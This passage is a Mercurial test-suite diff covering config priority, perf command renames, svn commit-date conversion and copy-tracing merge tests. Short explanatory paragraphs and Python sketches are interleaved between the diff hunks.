+++ b/tests/test-completion.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,6 +38,7 @@
paths
phase
pull
+ purge
push
recover
remove
@@ -129,6 +130,7 @@
debugrevspec
debugserve
debugsetparents
+ debugshell
debugsidedata
debugssl
debugstrip
@@ -270,7 +272,7 @@
debugbuilddag: mergeable-file, overwritten-file, new-file
debugbundle: all, part-type, spec
debugcapabilities:
- debugchangedfiles:
+ debugchangedfiles: compute
debugcheckstate:
debugcolor: style
debugcommands:
@@ -281,7 +283,7 @@
debugdate: extended
debugdeltachain: changelog, manifest, dir, template
debugdirstate: nodates, dates, datesort
- debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure
+ debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template
debugdownload: output
debugextensions: template
debugfileset: rev, all-files, show-matcher, show-stage
@@ -318,6 +320,7 @@
debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized
debugserve: sshstdio, logiofd, logiofile
debugsetparents:
+ debugshell:
debugsidedata: changelog, manifest, dir
debugssl:
debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft
@@ -354,10 +357,11 @@
paths: template
phase: public, draft, secret, force, rev
pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure
+ purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude
push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure
recover: verify
remove: after, force, subrepos, include, exclude, dry-run
- rename: after, at-rev, force, include, exclude, dry-run
+ rename: forget, after, at-rev, force, include, exclude, dry-run
resolve: all, list, mark, unmark, no-status, re-merge, tool, include, exclude, template
revert: all, date, rev, no-backup, interactive, include, exclude, dry-run
rollback: dry-run, force
--- a/tests/test-config.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-config.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,3 +1,17 @@
+Windows needs ';' as a path-list separator in an environment variable, and MSYS
+doesn't automatically convert it in every case.
+
+#if windows
+ $ path_list_var() {
+ > echo $1 | sed 's/:/;/'
+ > }
+#else
+ $ path_list_var() {
+ > echo $1
+ > }
+#endif
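
The same concern in Python terms: the entries of HGRCPATH are joined with the
platform's list separator, which is what the helper above normalizes. A small
sketch (make_hgrcpath is a hypothetical helper, not part of the test):

    import os

    def make_hgrcpath(entries):
        # os.pathsep is ':' on POSIX and ';' on Windows
        return os.pathsep.join(entries)
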
+
+
hide outer repo
$ hg init
@@ -388,3 +402,114 @@
> done
$ HGRCPATH=configs hg config section.key
99
+
+Configuration priority
+======================
+
+setup the necessary files
+
+ $ cat > file-A.rc << EOF
+ > [config-test]
+ > basic = value-A
+ > pre-include= value-A
+ > %include ./included.rc
+ > post-include= value-A
+ > [command-templates]
+ > log = "value-A\n"
+ > EOF
+
+ $ cat > file-B.rc << EOF
+ > [config-test]
+ > basic = value-B
+ > [ui]
+ > logtemplate = "value-B\n"
+ > EOF
+
+
+ $ cat > included.rc << EOF
+ > [config-test]
+ > pre-include= value-included
+ > post-include= value-included
+ > EOF
+
+ $ cat > file-C.rc << EOF
+ > %include ./included-alias-C.rc
+ > [ui]
+ > logtemplate = "value-C\n"
+ > EOF
+
+ $ cat > included-alias-C.rc << EOF
+ > [command-templates]
+ > log = "value-included\n"
+ > EOF
+
+
+ $ cat > file-D.rc << EOF
+ > [command-templates]
+ > log = "value-D\n"
+ > %include ./included-alias-D.rc
+ > EOF
+
+ $ cat > included-alias-D.rc << EOF
+ > [ui]
+ > logtemplate = "value-included\n"
+ > EOF
+
+Simple order checking
+---------------------
+
+If file B is read after file A, values from B overwrite values from A.
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic
+ value-B
+
+Ordering from include
+---------------------
+
+Values from an include overwrite values defined before the include, but not ones defined after it.
+
+ $ HGRCPATH="file-A.rc" hg config config-test.pre-include
+ value-included
+ $ HGRCPATH="file-A.rc" hg config config-test.post-include
+ value-A
+
+command line override
+---------------------
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI
+ value-CLI
+
+Alias ordering
+--------------
+
+The official config is now `command-templates.log`; the historical
+`ui.logtemplate` is a valid alternative for it.
+
+When both are defined, the config value read last "wins", and this should stay
+true if the config grows other aliases. In other words, the config value read
+earlier is considered "lower level" and the one read later "higher level", and
+higher-level values win.
+
+ $ HGRCPATH="file-A.rc" hg log -r .
+ value-A
+ $ HGRCPATH="file-B.rc" hg log -r .
+ value-B
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r .
+ value-B
+
+Alias and include
+-----------------
+
+The pre/post include priority should also apply when tie-breaking alternatives.
+See the case above for details about the two config options used.
+
+ $ HGRCPATH="file-C.rc" hg log -r .
+ value-C
+ $ HGRCPATH="file-D.rc" hg log -r .
+ value-included
+
+command line override
+---------------------
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . --config ui.logtemplate="value-CLI\n"
+ value-CLI
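
Taken together, these tests pin down one rule: configuration sources are read
in order (each HGRCPATH entry with %include expanded in place, then --config
last) and the value read last wins, including between aliases of the same
option. A sketch of that rule, not Mercurial's implementation:

    def resolve(layers):
        """layers: (source, {option: value}) pairs, in the order read."""
        result = {}
        for _source, values in layers:
            result.update(values)  # later reads overwrite earlier ones
        return result

    layers = [
        ('file-A.rc', {'config-test.basic': 'value-A'}),
        ('file-B.rc', {'config-test.basic': 'value-B'}),
        ('--config', {'config-test.basic': 'value-CLI'}),
    ]
    assert resolve(layers)['config-test.basic'] == 'value-CLI'
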
--- a/tests/test-contrib-perf.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-contrib-perf.t Tue Apr 20 11:01:06 2021 -0400
@@ -78,111 +78,137 @@
list of commands:
- perfaddremove
+ perf::addremove
+ (no help text available)
+ perf::ancestors
(no help text available)
- perfancestors
+ perf::ancestorset
(no help text available)
- perfancestorset
+ perf::annotate
(no help text available)
- perfannotate (no help text available)
- perfbdiff benchmark a bdiff between revisions
- perfbookmarks
+ perf::bdiff benchmark a bdiff between revisions
+ perf::bookmarks
benchmark parsing bookmarks from disk to memory
- perfbranchmap
+ perf::branchmap
benchmark the update of a branchmap
- perfbranchmapload
+ perf::branchmapload
benchmark reading the branchmap
- perfbranchmapupdate
+ perf::branchmapupdate
benchmark branchmap update from for <base> revs to <target>
revs
- perfbundleread
+ perf::bundleread
Benchmark reading of bundle files.
- perfcca (no help text available)
- perfchangegroupchangelog
+ perf::cca (no help text available)
+ perf::changegroupchangelog
Benchmark producing a changelog group for a changegroup.
- perfchangeset
+ perf::changeset
+ (no help text available)
+ perf::ctxfiles
(no help text available)
- perfctxfiles (no help text available)
- perfdiffwd Profile diff of working directory changes
- perfdirfoldmap
+ perf::diffwd Profile diff of working directory changes
+ perf::dirfoldmap
benchmap a 'dirstate._map.dirfoldmap.get()' request
- perfdirs (no help text available)
- perfdirstate benchmap the time of various distate operations
- perfdirstatedirs
+ perf::dirs (no help text available)
+ perf::dirstate
+ benchmap the time of various distate operations
+ perf::dirstatedirs
benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache
- perfdirstatefoldmap
+ perf::dirstatefoldmap
benchmap a 'dirstate._map.filefoldmap.get()' request
- perfdirstatewrite
+ perf::dirstatewrite
benchmap the time it take to write a dirstate on disk
- perfdiscovery
+ perf::discovery
benchmark discovery between local repo and the peer at given
path
- perffncacheencode
+ perf::fncacheencode
(no help text available)
- perffncacheload
+ perf::fncacheload
(no help text available)
- perffncachewrite
+ perf::fncachewrite
(no help text available)
- perfheads benchmark the computation of a changelog heads
- perfhelper-mergecopies
+ perf::heads benchmark the computation of a changelog heads
+ perf::helper-mergecopies
find statistics about potential parameters for
'perfmergecopies'
- perfhelper-pathcopies
+ perf::helper-pathcopies
find statistic about potential parameters for the
'perftracecopies'
- perfignore benchmark operation related to computing ignore
- perfindex benchmark index creation time followed by a lookup
- perflinelogedits
+ perf::ignore benchmark operation related to computing ignore
+ perf::index benchmark index creation time followed by a lookup
+ perf::linelogedits
(no help text available)
- perfloadmarkers
+ perf::loadmarkers
benchmark the time to parse the on-disk markers for a repo
- perflog (no help text available)
- perflookup (no help text available)
- perflrucachedict
+ perf::log (no help text available)
+ perf::lookup (no help text available)
+ perf::lrucachedict
(no help text available)
- perfmanifest benchmark the time to read a manifest from disk and return a
+ perf::manifest
+ benchmark the time to read a manifest from disk and return a
usable
- perfmergecalculate
+ perf::mergecalculate
(no help text available)
- perfmergecopies
+ perf::mergecopies
measure runtime of 'copies.mergecopies'
- perfmoonwalk benchmark walking the changelog backwards
- perfnodelookup
+ perf::moonwalk
+ benchmark walking the changelog backwards
+ perf::nodelookup
(no help text available)
- perfnodemap benchmark the time necessary to look up revision from a cold
+ perf::nodemap
+ benchmark the time necessary to look up revision from a cold
nodemap
- perfparents benchmark the time necessary to fetch one changeset's parents.
- perfpathcopies
+ perf::parents
+ benchmark the time necessary to fetch one changeset's parents.
+ perf::pathcopies
benchmark the copy tracing logic
- perfphases benchmark phasesets computation
- perfphasesremote
+ perf::phases benchmark phasesets computation
+ perf::phasesremote
benchmark time needed to analyse phases of the remote server
- perfprogress printing of progress bars
- perfrawfiles (no help text available)
- perfrevlogchunks
+ perf::progress
+ printing of progress bars
+ perf::rawfiles
+ (no help text available)
+ perf::revlogchunks
Benchmark operations on revlog chunks.
- perfrevlogindex
+ perf::revlogindex
Benchmark operations against a revlog index.
- perfrevlogrevision
+ perf::revlogrevision
Benchmark obtaining a revlog revision.
- perfrevlogrevisions
+ perf::revlogrevisions
Benchmark reading a series of revisions from a revlog.
- perfrevlogwrite
+ perf::revlogwrite
Benchmark writing a series of revisions to a revlog.
- perfrevrange (no help text available)
- perfrevset benchmark the execution time of a revset
- perfstartup (no help text available)
- perfstatus benchmark the performance of a single status call
- perftags (no help text available)
- perftemplating
+ perf::revrange
+ (no help text available)
+ perf::revset benchmark the execution time of a revset
+ perf::startup
+ (no help text available)
+ perf::status benchmark the performance of a single status call
+ perf::tags (no help text available)
+ perf::templating
test the rendering time of a given template
- perfunidiff benchmark a unified diff between revisions
- perfvolatilesets
+ perf::unidiff
+ benchmark a unified diff between revisions
+ perf::volatilesets
benchmark the computation of various volatile set
- perfwalk (no help text available)
- perfwrite microbenchmark ui.write (and others)
+ perf::walk (no help text available)
+ perf::write microbenchmark ui.write (and others)
(use 'hg help -v perf' to show built-in aliases and global options)
+
+ $ hg help perfaddremove
+ hg perf::addremove
+
+ aliases: perfaddremove
+
+ (no help text available)
+
+ options:
+
+ -T --template TEMPLATE display with template
+
+ (some details hidden, use --verbose to show complete help)
+
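
The renames above move every perf command under a "perf::" namespace while
keeping the historical flat name, as the "aliases:" line shows. A simplified
sketch of the usual registration pattern (assumed from mercurial.registrar
conventions; the real declarations live in contrib/perf.py and may differ):

    from mercurial import registrar

    cmdtable = {}
    command = registrar.command(cmdtable)

    @command(b'perf::addremove|perfaddremove')
    def perfaddremove(ui, repo, **opts):
        """placeholder body, for illustration only"""
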
$ hg perfaddremove
$ hg perfancestors
$ hg perfancestorset 2
--- a/tests/test-convert-cvs.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-cvs.t Tue Apr 20 11:01:06 2021 -0400
@@ -521,7 +521,7 @@
|cp932 |\x82\xa0 | x x o |
$ mkdir -p cvsrepo/transcoding
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> fp = open('cvsrepo/transcoding/file,v', 'wb')
> fp.write((b'''
> head 1.4;
--- a/tests/test-convert-filemap.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-filemap.t Tue Apr 20 11:01:06 2021 -0400
@@ -292,12 +292,12 @@
$ rm -rf source/.hg/store/data/dir/file4
#endif
$ hg -q convert --filemap renames.fmap --datesort source dummydest
- abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !)
+ abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !)
abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !)
[50]
$ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo
- ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !)
- ignoring: data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !)
+ ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !)
+ ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !)
ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !)
ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !)
$ hg up -q -R renames.repo
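
The message change in this hunk is only about how much of the node is
printed: the new output spells out the full 40-digit hex node where the old
one used its 12-digit prefix, e.g.:

    full = "e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c"
    assert full[:12] == "e96dce0bc6a2"  # the form the old message showed
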
--- a/tests/test-convert-hg-source.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-hg-source.t Tue Apr 20 11:01:06 2021 -0400
@@ -182,7 +182,7 @@
sorting...
converting...
4 init
- ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !)
+ ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !)
ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !)
3 changeall
2 changebagain
--- a/tests/test-convert-svn-sink.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-svn-sink.t Tue Apr 20 11:01:06 2021 -0400
@@ -54,10 +54,12 @@
2 2 test a
revision: 2
author: test
+ date: * (glob)
msg: modify a file
M /a
revision: 1
author: test
+ date: * (glob)
msg: add a file
A /a
A /d1
@@ -95,6 +97,7 @@
3 3 test b
revision: 3
author: test
+ date: * (glob)
msg: rename a file
D /a
A /b (from /a@2)
@@ -131,6 +134,7 @@
4 4 test c
revision: 4
author: test
+ date: * (glob)
msg: copy a file
A /c (from /b@3)
$ ls a a-hg-wc
@@ -167,6 +171,7 @@
5 5 test .
revision: 5
author: test
+ date: * (glob)
msg: remove a file
D /b
$ ls a a-hg-wc
@@ -209,6 +214,7 @@
6 6 test c
revision: 6
author: test
+ date: * (glob)
msg: make a file executable
M /c
#if execbit
@@ -247,6 +253,7 @@
8 8 test newlink
revision: 8
author: test
+ date: * (glob)
msg: move symlink
D /link
A /newlink (from /link@7)
@@ -278,6 +285,7 @@
7 7 test f
revision: 7
author: test
+ date: * (glob)
msg: f
D /c
A /d
@@ -315,6 +323,7 @@
1 1 test d1/a
revision: 1
author: test
+ date: * (glob)
msg: add executable file in new directory
A /d1
A /d1/a
@@ -343,6 +352,7 @@
2 2 test d2/a
revision: 2
author: test
+ date: * (glob)
msg: copy file to new directory
A /d2
A /d2/a (from /d1/a@1)
@@ -416,21 +426,25 @@
4 4 test right-2
revision: 4
author: test
+ date: * (glob)
msg: merge
A /right-1
A /right-2
revision: 3
author: test
+ date: * (glob)
msg: left-2
M /b
A /left-2
revision: 2
author: test
+ date: * (glob)
msg: left-1
M /b
A /left-1
revision: 1
author: test
+ date: * (glob)
msg: base
A /b
@@ -459,10 +473,12 @@
2 2 test .hgtags
revision: 2
author: test
+ date: * (glob)
msg: Tagged as v1.0
A /.hgtags
revision: 1
author: test
+ date: * (glob)
msg: Add file a
A /a
$ rm -rf a a-hg a-hg-wc
@@ -494,10 +510,12 @@
2 2 test exec
revision: 2
author: test
+ date: * (glob)
msg: remove executable bit
M /exec
revision: 1
author: test
+ date: * (glob)
msg: create executable
A /exec
$ test ! -x a-hg-wc/exec
@@ -540,11 +558,77 @@
2 2 test b
revision: 2
author: test
+ date: * (glob)
msg: Another change
A /b
revision: 1
author: test
+ date: * (glob)
msg: Some change
A /a
$ rm -rf a a-hg a-hg-wc
+
+Commit date conversion
+
+ $ hg init a
+
+ $ echo a >> a/a
+ $ hg add a
+ adding a/a
+ $ hg --cwd a ci -d '1 0' -A -m 'Change 1'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '2 0' -m 'Change 2'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '2 0' -m 'Change at the same time'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '1 0' -m 'Change in the past'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '3 0' -m 'Change in the future'
+
+ $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a
+ assuming destination a-hg
+ initializing svn repository 'a-hg'
+ initializing svn working copy 'a-hg-wc'
+ scanning source...
+ sorting...
+ converting...
+ 4 Change 1
+ 3 Change 2
+ 2 Change at the same time
+ 1 Change in the past
+ 0 Change in the future
+ $ svnupanddisplay a-hg-wc 0
+ 5 5 test .
+ 5 5 test a
+ revision: 5
+ author: test
+ date: 1970-01-01T00:00:03.000000Z
+ msg: Change in the future
+ M /a
+ revision: 4
+ author: test
+ date: 1970-01-01T00:00:01.000000Z
+ msg: Change in the past
+ M /a
+ revision: 3
+ author: test
+ date: 1970-01-01T00:00:02.000000Z
+ msg: Change at the same time
+ M /a
+ revision: 2
+ author: test
+ date: 1970-01-01T00:00:02.000000Z
+ msg: Change 2
+ M /a
+ revision: 1
+ author: test
+ date: 1970-01-01T00:00:01.000000Z
+ msg: Change 1
+ A /a
+
+ $ rm -rf a a-hg a-hg-wc
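
The dates in the output above are the svn:date rendering of the timestamps
given with -d: hg stores (unixtime, tz offset) pairs, while svn:date is UTC
ISO-8601 with microseconds. A sketch of the conversion (hg_to_svn_date is a
hypothetical helper for illustration):

    import datetime

    def hg_to_svn_date(unixtime, tzoffset):
        # the offset changes how a date is displayed, not the UTC instant
        dt = datetime.datetime.utcfromtimestamp(unixtime)
        return dt.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

    assert hg_to_svn_date(3, 0) == '1970-01-01T00:00:03.000000Z'
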
--- a/tests/test-convert.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert.t Tue Apr 20 11:01:06 2021 -0400
@@ -388,6 +388,23 @@
does not convert tags from the source repo to the target
repo. The default is False.
+ Subversion Destination
+ ######################
+
+ Original commit dates are not preserved by default.
+
+ convert.svn.dangerous-set-commit-dates
+ preserve original commit dates, forcefully setting
+ "svn:date" revision properties. This option is DANGEROUS and
+ may break some subversion functionality for the resulting
+ repository (e.g. filtering revisions with date ranges in
+ "svn log"), as original commit dates are not guaranteed to
+ be monotonically increasing.
+
+ For commit date setting to work, the destination repository must have the
+ "pre-revprop-change" hook configured to allow setting of the "svn:date"
+ revision property. See the Subversion documentation for more details.
+
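
A sketch of such a hook, assuming the standard pre-revprop-change interface
(Subversion invokes it with REPOS-PATH REV USER PROPNAME ACTION, and a zero
exit status allows the change); illustrative only:

    #!/usr/bin/env python3
    import sys

    def main(argv):
        propname = argv[4]
        if propname == 'svn:date':
            return 0  # allow convert to set commit dates
        sys.stderr.write('changing %s is not allowed\n' % propname)
        return 1

    if __name__ == '__main__':
        sys.exit(main(sys.argv))
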
options ([+] can be repeated):
-s --source-type TYPE source repository type
--- a/tests/test-copies-chain-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies-chain-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-#testcases filelog compatibility changeset sidedata upgraded
+#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel
=====================================================
Test Copy tracing for chain of copies involving merge
@@ -14,11 +14,24 @@
use git diff to see rename
+ $ cat << EOF >> ./no-linkrev
+ > #!$PYTHON
+ > # filter out linkrev part of the debugindex command
+ > import sys
+ > for line in sys.stdin:
+ >     if " linkrev " in line:
+ >         # header line: print unchanged
+ >         print(line.rstrip())
+ >     else:
+ >         # columns 6-13 hold the linkrev value; mask it with "*"
+ >         l = "%s *%s" % (line[:6], line[14:].rstrip())
+ >         print(l)
+ > EOF
+ $ chmod +x no-linkrev
+
$ cat << EOF >> $HGRCPATH
> [diff]
> git=yes
> [command-templates]
- > log={rev} {desc}\n
+ > log={desc}\n
> EOF
#if compatibility
@@ -45,28 +58,45 @@
#endif
+ $ cat > same-content.txt << EOF
+ > Here is some content that will be the same across multiple files.
+ >
+ > This is done on purpose so that we end up in some merge situations, where
+ > the resulting content is the same as in the parent(s), but new filenodes
+ > still need to be created to record some file history information
+ > (especially about copies).
+ > EOF
+
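
Sharing one blob across a, b, and h is what lets the merges below end up with
identical file content on both sides while still needing fresh filenodes: the
filelog node covers the parents and any copy metadata along with the text. A
simplified sketch of that hashing (modeled on Mercurial's revlog hash and
filelog metadata format; details may differ):

    import hashlib

    def filenode(p1, p2, text, copysource=None, copyrev=None):
        """p1/p2 are 20-byte parent nodes; all arguments are bytes."""
        # copy metadata is folded into the hashed text, so identical content
        # with new copy information still yields a brand new node
        if copysource is not None:
            meta = b'\x01\ncopy: %s\ncopyrev: %s\n\x01\n' % (copysource, copyrev)
            text = meta + text
        lo, hi = sorted([p1, p2])
        return hashlib.sha1(lo + hi + text).digest()
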
$ hg init repo-chain
$ cd repo-chain
Add some linear rename initialy
- $ echo a > a
- $ echo b > b
- $ echo h > h
- $ hg ci -Am 'i-0 initial commit: a b h'
+ $ cp ../same-content.txt a
+ $ cp ../same-content.txt b
+ $ cp ../same-content.txt h
+ $ echo "original content for P" > p
+ $ echo "original content for Q" > q
+ $ echo "original content for R" > r
+ $ hg ci -Am 'i-0 initial commit: a b h p q r'
adding a
adding b
adding h
+ adding p
+ adding q
+ adding r
$ hg mv a c
- $ hg ci -Am 'i-1: a -move-> c'
+ $ hg mv p s
+ $ hg ci -Am 'i-1: a -move-> c, p -move-> s'
$ hg mv c d
- $ hg ci -Am 'i-2: c -move-> d'
+ $ hg mv s t
+ $ hg ci -Am 'i-2: c -move-> d, s -move-> t'
$ hg log -G
- @ 2 i-2: c -move-> d
+ @ i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
And having another branch with renames on the other side
@@ -76,15 +106,15 @@
$ hg mv e f
$ hg ci -Am 'a-2: e -move-> f'
$ hg log -G --rev '::.'
- @ 4 a-2: e -move-> f
+ @ a-2: e -move-> f
|
- o 3 a-1: d -move-> e
+ o a-1: d -move-> e
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Have a branching with nothing on one side
@@ -95,13 +125,13 @@
$ hg ci -m 'b-1: b update'
created new head
$ hg log -G --rev '::.'
- @ 5 b-1: b update
+ @ b-1: b update
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Create a branch that delete a file previous renamed
@@ -112,13 +142,13 @@
$ hg ci -m 'c-1 delete d'
created new head
$ hg log -G --rev '::.'
- @ 6 c-1 delete d
+ @ c-1 delete d
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Create a branch that delete a file previous renamed and recreate it
@@ -132,15 +162,15 @@
$ hg add d
$ hg ci -m 'd-2 re-add d'
$ hg log -G --rev '::.'
- @ 8 d-2 re-add d
+ @ d-2 re-add d
|
- o 7 d-1 delete d
+ o d-1 delete d
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Having another branch renaming a different file to the same filename as another
@@ -153,16 +183,61 @@
$ hg mv g f
$ hg ci -m 'e-2 g -move-> f'
$ hg log -G --rev '::.'
- @ 10 e-2 g -move-> f
+ @ e-2 g -move-> f
+ |
+ o e-1 b -move-> g
+ |
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 9 e-1 b -move-> g
+ o i-0 initial commit: a b h p q r
+
+ $ hg up -q null
+
+Having a branch similar to the 'a' one, but moving the 'p' file around.
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv t u
+ $ hg ci -Am 'p-1: t -move-> u'
+ created new head
+ $ hg mv u v
+ $ hg ci -Am 'p-2: u -move-> v'
+ $ hg log -G --rev '::.'
+ @ p-2: u -move-> v
+ |
+ o p-1: t -move-> u
+ |
+ o i-2: c -move-> d, s -move-> t
|
- o 2 i-2: c -move-> d
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+ $ hg up -q null
+
+Having another branch renaming a different file to the same filename as another
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv r w
+ $ hg ci -m 'q-1 r -move-> w'
+ created new head
+ $ hg mv w v
+ $ hg ci -m 'q-2 w -move-> v'
+ $ hg log -G --rev '::.'
+ @ q-2 w -move-> v
|
- o 0 i-0 initial commit: a b h
+ o q-1 r -move-> w
+ |
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+ $ hg up -q null
Setup all merge
===============
@@ -176,35 +251,37 @@
- rename on one side
- unrelated change on the other side
+ $ case_desc="simple merge - A side: multiple renames, B side: unrelated update"
+
$ hg up 'desc("b-1")'
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("a-2")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBAm-0 simple merge - one way'
+ $ hg ci -m "mBAm-0 $case_desc - one way"
$ hg up 'desc("a-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mABm-0 simple merge - the other way'
+ $ hg ci -m "mABm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mABm")+desc("mBAm"))'
- @ 12 mABm-0 simple merge - the other way
+ @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
|\
- +---o 11 mBAm-0 simple merge - one way
+ +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
| |/
- | o 5 b-1: b update
+ | o b-1: b update
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -216,12 +293,14 @@
- one deleting the change
and recreate an unrelated file after the merge
+ $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update"
+
$ hg up 'desc("b-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBCm-0 simple merge - one way'
+ $ hg ci -m "mBCm-0 $case_desc - one way"
$ echo bar > d
$ hg add d
$ hg ci -m 'mBCm-1 re-add d'
@@ -230,29 +309,29 @@
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mCBm-0 simple merge - the other way'
+ $ hg ci -m "mCBm-0 $case_desc - the other way"
created new head
$ echo bar > d
$ hg add d
$ hg ci -m 'mCBm-1 re-add d'
$ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))'
- @ 16 mCBm-1 re-add d
+ @ mCBm-1 re-add d
|
- o 15 mCBm-0 simple merge - the other way
+ o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
|\
- | | o 14 mBCm-1 re-add d
+ | | o mBCm-1 re-add d
| | |
- +---o 13 mBCm-0 simple merge - one way
+ +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Comparing with a merge re-adding the file afterward
@@ -262,84 +341,139 @@
- one with change to an unrelated file
- one deleting and recreating the change
+ $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)"
+
$ hg up 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("d-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBDm-0 simple merge - one way'
+ $ hg ci -m "mBDm-0 $case_desc - one way"
$ hg up 'desc("d-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
